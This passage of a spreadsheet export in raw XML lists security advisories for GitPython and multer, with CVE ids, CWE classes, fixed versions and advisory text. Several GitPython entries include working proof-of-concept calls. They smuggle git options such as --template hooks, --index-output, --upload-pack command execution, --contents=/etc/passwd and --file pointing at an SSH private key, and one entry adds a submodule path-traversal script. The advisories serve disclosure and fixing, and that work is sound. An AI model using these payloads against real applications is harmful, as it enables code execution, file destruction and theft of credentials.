Arbitrary code execution (hook fires on next git op) at the privileges of the host process. Two preconditions raise attack complexity (AC:H): the app must forward a `template=` kwarg (KEY control) AND the attacker must stage an executable hook directory at a known path — the same profile GHSA-6p8h-3wgx-97gf accepted as HIGH for the clone path. Default `allow_unsafe_options` is irrelevant here because `Repo.init` has no guard at all.

## Proof of Concept
```python
# attacker stages /evil/hooks/post-commit (executable)
from git import Repo
Repo.init(path, template="/evil")
# next commit runs /evil/hooks/post-commit -&gt; ACE
```

## Attack Chain
1. Entry: attacker stages `/evil/hooks/post-commit` (executable) and gets the app to call `Repo.init(path, template='/evil')`.
2. Check: NONE on `Repo.init`. Bypass proof: base.py:1435 is a bare `git.init(**kwargs)`. argv (observed): `['git','init','--template=/evil']`.
3. Sink: git copies `/evil/hooks/post-commit` → `&lt;repo&gt;/.git/hooks/post-commit`.
4. Impact: next commit runs the hook → arbitrary code execution.

## Bypass Evidence
Independently reproduced (gate harness): `Repo.init(dst, template='&lt;evil&gt;')` → argv `['git','init','--template=&lt;evil&gt;']` unguarded; hook copied into `.git/hooks/post-commit`; after `git commit` the `INIT_ACE` marker was created. `--separate-git-dir=&lt;path&gt;` is a parallel arbitrary-redirect vector through the same unguarded sink (value control only).

## Affected Versions
`GitPython &lt;= 3.1.57` (unguarded `git.init(**kwargs)` present verbatim on the latest release tag).

## Suggested Fix
Add a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `Repo.init`, consulting a denylist that includes `--template` and `--separate-git-dir` (path-taking / hook-installing options).

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="S110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76218</t></is></c></row><row r="111"><c r="A111" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B111" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C111" s="5" t="inlineStr"><is><t>CVE-2026-76219</t></is></c><c r="D111" s="5" t="inlineStr" /><c r="E111" s="5" t="inlineStr" /><c r="F111" s="5" t="inlineStr" /><c r="G111" s="5" t="inlineStr" /><c r="H111" s="5" t="n"><v>0.003</v></c><c r="I111" s="5" t="inlineStr" /><c r="J111" s="5" t="inlineStr" /><c r="K111" s="5" t="inlineStr" /><c r="L111" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M111" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N111" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O111" s="5" t="inlineStr" /><c r="P111" s="5" t="inlineStr" /><c r="Q111" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R111" s="5" t="inlineStr"><is><t>## Summary
`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=&lt;file&gt;` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).

## Root Cause
`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.

## Impact
Arbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's "overwrite-any-path = I:H" rule). Pure VALUE control (positional treeish). Default configuration.

## Proof of Concept
```python
IndexFile.from_tree(repo, "--index-output=/home/victim/.bashrc")
# target overwritten with a valid git-index blob (DIRC...)
```

## Attack Chain
1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish="--index-output=/home/victim/.bashrc"`.
2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.
3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=&lt;tmp&gt;','--index-output=/…/victim']` (last-wins).
4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.

## Bypass Evidence
Independently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=&lt;victim&gt;')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\x00\x00\x00\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.

## Affected Versions
`GitPython &lt;= 3.1.57` (sinks present verbatim on the latest release tag).

## Suggested Fix
Add a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.</t></is></c><c r="S111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76219</t></is></c></row><row r="112"><c r="A112" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B112" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C112" s="5" t="inlineStr"><is><t>CVE-2026-76220</t></is></c><c r="D112" s="5" t="inlineStr" /><c r="E112" s="5" t="inlineStr" /><c r="F112" s="5" t="inlineStr" /><c r="G112" s="5" t="inlineStr" /><c r="H112" s="5" t="n"><v>0.006</v></c><c r="I112" s="5" t="inlineStr" /><c r="J112" s="5" t="inlineStr" /><c r="K112" s="5" t="inlineStr" /><c r="L112" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M112" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N112" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O112" s="5" t="inlineStr" /><c r="P112" s="5" t="inlineStr" /><c r="Q112" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R112" s="5" t="inlineStr"><is><t>## Summary
The `check_unsafe_options` guard can be bypassed on every guarded method (clone/clone_from, fetch/pull/push, ls_remote, iter_commits, blame, archive) by combining a single-character kwarg with `split_single_char_options=False`. The guard's candidate list omits the smuggled option, but `transform_kwarg` emits a JOINED `-n&lt;value&gt;` argv token that git parses as `--upload-pack=&lt;cmd&gt;`, yielding arbitrary command execution at the default `allow_unsafe_options=False`. This is an incomplete-fix bypass of commit `e8d0fbf7` (the fix for GHSA-r9mr-m37c-5fr3), which only emits value-derived candidates when `split_single_char_options` is True.

## Root Cause
`_option_candidates` derives value-token candidates only under `if len(key)==1 and split_single_char_options:` (cmd.py:1048, added by `e8d0fbf7`). With `split_single_char_options=False`, `_option_candidates([], {"n":"utouch &lt;cmd&gt;;git-upload-pack"})` returns only `['-n']` (not on the denylist), so the guard passes. But `transform_kwarg('n', value, split_single_char_options=False)` emits the JOINED token `-nutouch &lt;cmd&gt;;git-upload-pack` (cmd.py:1631). git clusters value-less short flags then parses `-u&lt;cmd&gt;` = `--upload-pack=&lt;cmd&gt;` → command execution. The hardened guard WOULD block the joined token if it saw it — the flaw is it never receives it.

## Impact
Arbitrary OS command execution as the host process (via `--upload-pack`) at default `allow_unsafe_options=False`, affecting all guarded methods that forward kwargs. Precondition: the app forwards a user-controlled kwargs dict containing `split_single_char_options=False` plus a single-char key (same user-dict-forwarding model GHSA-r9mr-m37c-5fr3 accepts).

## Proof of Concept
```python
from git import Repo
Repo.clone_from(src, dst,
    n="utouch /tmp/ACE;git-upload-pack",
    split_single_char_options=False)   # /tmp/ACE created -&gt; ACE
```

## Attack Chain
1. Entry: app forwards user kwargs to `Repo.clone_from(url, path, **kwargs)`: `{split_single_char_options: False, n: 'utouch /tmp/ACE;git-upload-pack'}`.
2. Check: `check_unsafe_options(_option_candidates([], kwargs), unsafe_git_clone_options)`. Guard: denylist includes `--upload-pack`/`-u`. Bypass proof: `_option_candidates` yields only `['-n']` (value token skipped because `split=False`); guard never sees `-u`.
3. Sink: `transform_kwarg` emits joined token (cmd.py:1631). argv (observed): `['git','clone','-v','-nutouch /tmp/ACE;git-upload-pack','--','&lt;src&gt;','&lt;dst&gt;']`.
4. Impact: git clusters `-n` + `-u&lt;cmd&gt;` → runs upload-pack command → ACE.

## Bypass Evidence
Independently reproduced (gate harness, default `allow_unsafe_options=False`): the `split=False` payload created the marker `VH05_GATE_ACE` (ACE); the clone returned normally (guard bypassed). Control: `n='--upload-pack=…'` (split default True) → `UnsafeOptionError: --upload-pack is not allowed`. Fix-commit read: `e8d0fbf7` extends candidates only under `if len(key)==1 and split_single_char_options:` — split=False skips value emission. Also confirmed the earlier clustering-parse fix (commit `56806080`) does not cover this because the guard only ever receives `['-n']`.

## Affected Versions
`GitPython &lt;= 3.1.57` (code present verbatim on the latest release tag).

## Suggested Fix
Make `_option_candidates` emit value-derived candidates regardless of `split_single_char_options` (i.e. also for the joined `-n&lt;value&gt;` form), OR run `check_unsafe_options` over the fully-transformed argv rather than the reconstructed name-only candidate list.

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="S112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76220</t></is></c></row><row r="113"><c r="A113" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B113" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C113" s="5" t="inlineStr"><is><t>CVE-2026-76222</t></is></c><c r="D113" s="5" t="inlineStr" /><c r="E113" s="5" t="inlineStr" /><c r="F113" s="5" t="inlineStr" /><c r="G113" s="5" t="inlineStr" /><c r="H113" s="5" t="n"><v>0.003</v></c><c r="I113" s="5" t="inlineStr" /><c r="J113" s="5" t="inlineStr" /><c r="K113" s="5" t="inlineStr" /><c r="L113" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M113" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N113" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O113" s="5" t="inlineStr" /><c r="P113" s="5" t="inlineStr" /><c r="Q113" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R113" s="5" t="inlineStr"><is><t>### Summary
GitPython computes the on-disk location of a submodule's separate Git directory (`.git/modules/&lt;name&gt;`) from the submodule's `.gitmodules` section name with no validation. Because that name is fully attacker-controlled content of a cloned repository, a malicious repository can set a submodule name to a traversal string (e.g. `../../../../home/victim/.something`) and cause GitPython to create and initialize a full Git repository at an attacker-chosen filesystem path outside the intended clone directory. The only precondition is that a victim clones the malicious repository with GitPython and runs submodule initialization (`submodule_update(init=True)` / `sm.update(init=True)`), a very common and often automatic step. Core Git itself already blocks this exact attack class (CVE-2018-11235), but GitPython's independent reimplementation never adopted an equivalent check.

### Details
`src/GitPython/git/objects/submodule/util.py` `sm_name()` strips the `submodule "` / `"` wrapper from a `.gitmodules` `[submodule "..."]` header and returns the result unchecked. `Submodule.iter_items()` in `src/GitPython/git/objects/submodule/base.py` reads this via `sm_name(sms)` and assigns it to `sm._name`; unlike the submodule `path`, `name` is never used for a tree lookup, so it is never implicitly validated. `Submodule._module_abspath()` then builds `osp.join(parent_repo.git_dir, "modules", name)` - `os.path.join` does not normalize `../` sequences. `Submodule._clone_repo()` passes this value straight to `os.makedirs()` and to `git clone --separate-git-dir=&lt;module_abspath&gt;`, creating and populating a full Git repository (objects, refs, hooks, config) at the escaped path. Attack prerequisite: attacker controls a repository the victim clones and initializes submodules for.

### PoC
1. Environment: Docker image built `FROM python:3.11-slim`, with `git` installed via `apt-get install -y git` (Debian bookworm packaged version, described in the advisory as "git 2.x"; the host-side verification separately used system git `2.34.1`, but no exact version is pinned for the git binary inside this Docker image). GitPython is installed inside the container via `pip install /src/GitPython` from this repository's own source, which the advisory states resolved to the officially released `GitPython==3.1.57` and `gitdb==4.0.12`.
2. Configuration / preconditions: None beyond what's described - the victim must clone the attacker's repository with GitPython and run submodule initialization (`repo.submodules` + `sm.update(init=True)`, equivalent to `git submodule update --init`).
3. Commands run (quoted verbatim from the advisory's "Confirmed test run" section):
```bash
$ docker build -f GHSA/testing/Dockerfile -t ghsa-gitpython-poc .
$ docker run --rm ghsa-gitpython-poc
```
(Per the Dockerfile, `docker run` executes `/work/run_all.sh`, which in turn runs `build_attacker_repo.sh`, then `poc_gitpython.py`, then `poc_control_realgit.sh`.)
4. Full source of the PoC script (`GHSA/testing/poc_gitpython.py`), verbatim:
```python
"""GHSA-001 PoC: GitPython side.

Clones the attacker repo and runs the equivalent of
`git submodule update --init` via GitPython, then checks whether a git
repository was created outside the clone directory.
"""
import os
import shutil

import git

CLONE_DIR = '/work/victim_clone/repo'
ESCAPE_TARGET = '/tmp/gitpython_poc_escaped_root'


def main():
    shutil.rmtree(os.path.dirname(CLONE_DIR), ignore_errors=True)
    shutil.rmtree(ESCAPE_TARGET, ignore_errors=True)
    os.makedirs(os.path.dirname(CLONE_DIR), exist_ok=True)

    print(f'GitPython version: {git.__version__}')
    repo = git.Repo.clone_from('/work/attacker_repo', CLONE_DIR)
    print('Cloned into:', repo.working_tree_dir)

    sms = list(repo.submodules)
    for sm in sms:
        print('  submodule name:', repr(sm.name))
        print('  submodule path:', repr(sm.path))

    print('escape_target exists before update:', os.path.exists(ESCAPE_TARGET))

    for sm in sms:
        try:
            sm.update(init=True)
        except Exception as e:
            print('sm.update raised:', repr(e))

    exists = os.path.exists(ESCAPE_TARGET)
    print('escape_target exists after update:', exists)
    if exists:
        print('escape_target contents:', os.listdir(ESCAPE_TARGET))

    print('POC_RESULT=VULNERABLE' if exists else 'POC_RESULT=SAFE')


if __name__ == '__main__':
    main()
```
5. Exact captured terminal output (verbatim, from the original advisory's "Confirmed test run (Docker, released package)" section):
```
=== GitPython PoC (vulnerable path) ===
GitPython version: 3.1.57
Cloned into: /work/victim_clone/repo
  submodule name: '../../../../../../tmp/gitpython_poc_escaped_root/modules_dir'
  submodule path: 'legit_dir'
escape_target exists before update: False
escape_target exists after update: True
escape_target contents: ['modules_dir']
POC_RESULT=VULNERABLE

=== Control: real git CLI on identical repo ===
warning: ignoring suspicious submodule name: ../../../../../../tmp/gitpython_poc_escaped_root/modules_dir
warning: ignoring suspicious submodule name: ../../../../../../tmp/gitpython_poc_escaped_root/modules_dir
fatal: No url found for submodule path 'legit_dir' in .gitmodules
CONTROL_RESULT=SAFE (real git correctly refused)
```
6. Payload: the attacker rewrites the `.gitmodules` section header from `[submodule "legit_dir"]` to `[submodule "../../../../../../tmp/gitpython_poc_escaped_root/modules_dir"]` (built by `build_attacker_repo.sh`, part of the harness in `GHSA/testing/`). The malicious part is the `../../../../../../` traversal sequence embedded in the submodule *name* (not the tree-validated `path`), which becomes the on-disk target for the submodule's separate git directory.
7. Expected vs. observed: A safe implementation (as demonstrated by the real `git` CLI control run) rejects the submodule name with "ignoring suspicious submodule name" and refuses to create anything outside the repository. GitPython instead created the escape-target directory and a fully-initialized Git repository at `/tmp/gitpython_poc_escaped_root/modules_dir`, confirmed by `escape_target exists after update: True` and its listed contents.
8. Security impact demonstrated: arbitrary filesystem directory and Git-repository creation at an attacker-chosen absolute path outside the victim's intended clone directory, populated with attacker-controlled content sourced from the submodule's own (also attacker-controlled) `url`.

### Impact
Path traversal (CWE-22) / external control of file path (CWE-73) leading to arbitrary directory and Git-repository creation outside the intended clone directory. Integrity impact is High (attacker chooses destination path and, via the submodule URL, much of the written content); Confidentiality impact is None (only creation was demonstrated); Availability impact is Low-Medium (disk-exhaustion potential). No authentication is required; the attacker only needs to control a repository the victim clones and initializes submodules for - a routine, often fully-automatic operation in CI pipelines, IDE integrations, and dependency-management tooling.</t></is></c><c r="S113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76222</t></is></c></row><row r="114"><c r="A114" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B114" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C114" s="5" t="inlineStr"><is><t>CVE-2026-77037</t></is></c><c r="D114" s="5" t="inlineStr" /><c r="E114" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F114" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G114" s="5" t="inlineStr" /><c r="H114" s="5" t="n"><v>0.003</v></c><c r="I114" s="5" t="inlineStr" /><c r="J114" s="5" t="inlineStr" /><c r="K114" s="5" t="inlineStr" /><c r="L114" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M114" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N114" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O114" s="5" t="inlineStr" /><c r="P114" s="5" t="inlineStr" /><c r="Q114" s="5" t="inlineStr"><is><t>CWE-400, CWE-459</t></is></c><c r="R114" s="5" t="inlineStr"><is><t>### Impact

A vulnerability in multer `2.2.0` allows an attacker to trigger a Denial of Service (DoS) by aborting or truncating multipart uploads. When using `diskStorage`, the destination write stream is not closed if the upload is aborted before it finishes, so each failed request leaks an open file descriptor and retains its disk blocks until the process exits. Repeated failed uploads can exhaust the available file descriptors. All applications using multer's disk storage are affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

None.</t></is></c><c r="S114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t></is></c></row><row r="115"><c r="A115" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B115" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C115" s="5" t="inlineStr"><is><t>CVE-2026-77063</t></is></c><c r="D115" s="5" t="inlineStr" /><c r="E115" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F115" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G115" s="5" t="inlineStr" /><c r="H115" s="5" t="n"><v>0.002</v></c><c r="I115" s="5" t="inlineStr" /><c r="J115" s="5" t="inlineStr" /><c r="K115" s="5" t="inlineStr" /><c r="L115" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M115" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N115" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O115" s="5" t="inlineStr" /><c r="P115" s="5" t="inlineStr" /><c r="Q115" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R115" s="5" t="inlineStr"><is><t>### Impact

When `multer` is configured with an asynchronous `fileFilter`, the `limits.fileSize` limit can be bypassed. The `'limit'` event is registered inside the async `fileFilter` callback, so if a file exceeds `limits.fileSize` before that callback runs, the event is missed and the oversized upload is accepted instead of being rejected with a `LIMIT_FILE_SIZE` error. Applications that rely on `limits.fileSize` to reject oversized uploads are affected on all upload methods (`.single()`, `.array()`, `.fields()`, `.any()`). Uploads using a synchronous `fileFilter` are not affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

Use a synchronous `fileFilter`, or validate the uploaded file size after the upload completes.</t></is></c><c r="S115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77063</t></is></c></row><row r="116"><c r="A116" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B116" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C116" s="5" t="inlineStr"><is><t>CVE-2026-77078</t></is></c><c r="D116" s="5" t="inlineStr" /><c r="E116" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F116" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G116" s="5" t="inlineStr" /><c r="H116" s="5" t="n"><v>0.003</v></c><c r="I116" s="5" t="inlineStr" /><c r="J116" s="5" t="inlineStr" /><c r="K116" s="5" t="inlineStr" /><c r="L116" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M116" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N116" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O116" s="5" t="inlineStr" /><c r="P116" s="5" t="inlineStr" /><c r="Q116" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="R116" s="5" t="inlineStr"><is><t>### Impact

A vulnerability in multer allows a remote, unauthenticated attacker to crash the Node.js process with a single `multipart/form-data` request. Two specially crafted text field names cause an uncaught `RangeError: Invalid array length` inside multer's field parsing, which is not routed to the application error handler and terminates the process. All applications using multer to parse multipart requests are affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

None.</t></is></c><c r="S116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t></is></c></row><row r="117"><c r="A117" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B117" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C117" s="5" t="inlineStr"><is><t>CVE-2026-78678</t></is></c><c r="D117" s="5" t="inlineStr" /><c r="E117" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F117" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G117" s="5" t="inlineStr" /><c r="H117" s="5" t="n"><v>0.002</v></c><c r="I117" s="5" t="inlineStr" /><c r="J117" s="5" t="inlineStr" /><c r="K117" s="5" t="inlineStr" /><c r="L117" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M117" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N117" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O117" s="5" t="inlineStr" /><c r="P117" s="5" t="inlineStr" /><c r="Q117" s="5" t="inlineStr"><is><t>CWE-88, CWE-200</t></is></c><c r="R117" s="5" t="inlineStr"><is><t>## Summary
`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents &lt;file&gt;` and `-S &lt;file&gt;`, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=&lt;path&gt;` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).

## Root Cause
`unsafe_git_revision_options = ["--output","-o"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.

## Impact
Arbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
result = repo.blame("--contents=/etc/passwd", "a.txt")
# result rows carry the victim file's line text
```

## Attack Chain
1. Entry: app calls `repo.blame(rev, file)` with attacker `rev="--contents=/etc/passwd"` (or kwarg `contents="/etc/passwd"`, or `-S`).
2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `["--output","-o"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.
3. Sink: `self.git.blame(rev, "--", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=&lt;secret&gt;','HEAD','--','a.txt']`.
4. Impact: blame result rows carry the victim file's line text.

## Bypass Evidence
Independently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=&lt;secret&gt;','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.

## Affected Versions
`GitPython &lt;= 3.1.58` (denylist present verbatim on the latest release tag).

## Suggested Fix
Prefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule "the option takes a filesystem path" rather than "the option writes output".

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="S117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78678</t></is></c></row><row r="118"><c r="A118" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B118" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C118" s="5" t="inlineStr"><is><t>CVE-2026-78679</t></is></c><c r="D118" s="5" t="inlineStr" /><c r="E118" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F118" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G118" s="5" t="inlineStr" /><c r="H118" s="5" t="n"><v>0.002</v></c><c r="I118" s="5" t="inlineStr" /><c r="J118" s="5" t="inlineStr" /><c r="K118" s="5" t="inlineStr" /><c r="L118" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M118" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N118" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O118" s="5" t="inlineStr" /><c r="P118" s="5" t="inlineStr" /><c r="Q118" s="5" t="inlineStr"><is><t>CWE-88, CWE-200</t></is></c><c r="R118" s="5" t="inlineStr"><is><t>## Summary
`TagReference.create()` forwards a caller-influenced positional `reference` value into `git tag` without it ever being inspected by the unsafe-option guard, allowing an arbitrary file read (the file's contents are returned in-band as the annotated tag message). This is an incomplete-fix bypass of commit `3af0c251` (the fix for GHSA-3f7w-8rr8-f37f's tag instance).

## Root Cause
The fix `3af0c251` added `unsafe_git_tag_options = ["--file","-F"]` and a guard call, but the guard is `Git.check_unsafe_options(options=Git._option_candidates([], kwargs), unsafe_options=...)` at `git/refs/tag.py:139` — it passes an EMPTY args list and inspects **kwargs only**. The dangerous values `path` and `reference` are POSITIONALS (`args = (path, reference)`, tag.py:156), placed before any `--`. A user-influenced `reference="--file=&lt;path&gt;"` therefore reaches `git tag` as the exact `--file` option the fix intended to block, creating an annotated tag whose message is the file's contents.

## Impact
Arbitrary local file read at the privileges of the host process; contents returned in-band via `tagref.tag.message`. Requires the embedding application to forward a caller-influenced `reference` value into `TagReference.create()` (pure VALUE control — the CVE-2026-42215 threat model). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
from git import TagReference
t = TagReference.create(repo, "vpwn", reference="--file=/home/app/.ssh/id_rsa")
print(t.tag.message)   # contents of the file
```

## Attack Chain
1. Entry: app calls `TagReference.create(repo, name, reference=&lt;user&gt;)` with `reference="--file=/home/app/.ssh/id_rsa"`.
2. Check: `Git.check_unsafe_options(_option_candidates([], kwargs), ["--file","-F"])` @ tag.py:137-141. Guard: denylist includes `--file`/`-F`. Bypass proof: `_option_candidates` receives `args=[]` → the positional `reference` is never a candidate (the kwarg spelling `file="…"` IS blocked; only the positional escapes).
3. Sink: `repo.git.tag(*args, **kwargs)` @ tag.py:158 → no `--`. argv (observed): `['git','tag','-f','vpwn','--file=&lt;secret&gt;']`.
4. Impact: annotated tag created; `tagref.tag.message` == file contents (arbitrary file read).

## Bypass Evidence
Independently reproduced (independent test harness, git 2.43.0, default `allow_unsafe_options=False`): `TagReference.create(repo,'vp','--file=&lt;secret&gt;')` → PASSED; `tag.message == 'GATE_SECRET_LINE_A\nGATE_SECRET_LINE_B'`. Control: `TagReference.create(..., file='&lt;secret&gt;')` → `UnsafeOptionError: --file is not allowed`. Fix-commit read: `3af0c251` adds `_option_candidates([], kwargs)` (empty args → positional never a candidate).

## Affected Versions
`GitPython &lt;= 3.1.58` (sink present verbatim on the latest release tag; `git diff 3.1.57..HEAD` touches only test files).

## Suggested Fix
Include the positional `reference` (and `path`) in the option-candidate list passed to `check_unsafe_options`, or place a `--` separator before the positional arguments in `TagReference.create()`.

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="S118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78679</t></is></c></row><row r="119"><c r="A119" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B119" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C119" s="5" t="inlineStr"><is><t>CVE-2026-82333</t></is></c><c r="D119" s="5" t="inlineStr" /><c r="E119" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F119" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G119" s="5" t="inlineStr" /><c r="H119" s="5" t="n"><v>0.003</v></c><c r="I119" s="5" t="inlineStr" /><c r="J119" s="5" t="inlineStr" /><c r="K119" s="5" t="inlineStr" /><c r="L119" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M119" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N119" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O119" s="5" t="inlineStr" /><c r="P119" s="5" t="inlineStr" /><c r="Q119" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R119" s="5" t="inlineStr"><is><t>### Impact

multer is vulnerable to a Denial of Service (DoS) via a crafted array index in multipart field names. The `append-field` dependency parses bracket notation in field names, and a large numeric index such as `items[4294967294]` forces allocation of a maximum-length sparse array. A following field with a non-numeric key on the same base then converts that array to an object by iterating its full length, which consumes CPU synchronously and leaves the process unable to handle other requests. A single HTTP request with a crafted multipart body is sufficient to exploit this, and it affects multer 1.x and 2.x.

### Patches

Users should upgrade to `2.3.0` and configure `limits.fieldArrayIndexLimit` to the minimum array index their application requires.

### Workarounds

